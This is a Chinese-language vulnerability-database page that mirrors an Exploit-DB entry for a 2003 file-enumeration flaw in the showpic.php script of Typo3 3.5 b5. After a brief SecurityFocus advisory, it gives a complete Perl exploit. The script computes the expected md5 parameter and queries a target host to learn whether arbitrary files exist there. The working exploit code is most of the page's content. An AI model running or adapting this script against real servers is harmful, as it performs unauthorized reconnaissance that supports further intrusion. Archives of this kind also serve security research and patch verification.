Typo3 3.5 b5 – ‘showpic.php’ File Enumeration

Typo3 3.5 b5 – ‘showpic.php’ File Enumeration

漏洞ID 1053729 漏洞类型
发布时间 2003-02-28 更新时间 2003-02-28
图片[1]-Typo3 3.5 b5 – ‘showpic.php’ File Enumeration-安全小百科CVE编号 N/A
图片[2]-Typo3 3.5 b5 – ‘showpic.php’ File Enumeration-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22297
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6982/info

TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be useful in mounting further attacks against the host system. 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use Digest::MD5 qw(md5_hex);
($ho,$fi) = @ARGV;
$md5 = md5_hex("$fi||||");
$ua = new LWP::UserAgent(); $ua->agent("Opera 6.0");
$uri = "http://".$ho."/typo3/showpic.php?file=$fi&md5=$md5";
$req = HTTP::Request->new("GET",$uri);
$res = $ua->request($req);
if ($res->content !~ /was not found/ && $res->content !~ /No valid/) {print "n$fi existsn";}
else {print "n$fi not foundn";}

相关推荐: Multiple Vendor LC_MESSAGES libc Buffer Overflow Vulnerability

Multiple Vendor LC_MESSAGES libc Buffer Overflow Vulnerability 漏洞ID 1104746 漏洞类型 Boundary Condition Error 发布时间 1999-05-22 更新时间 199…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享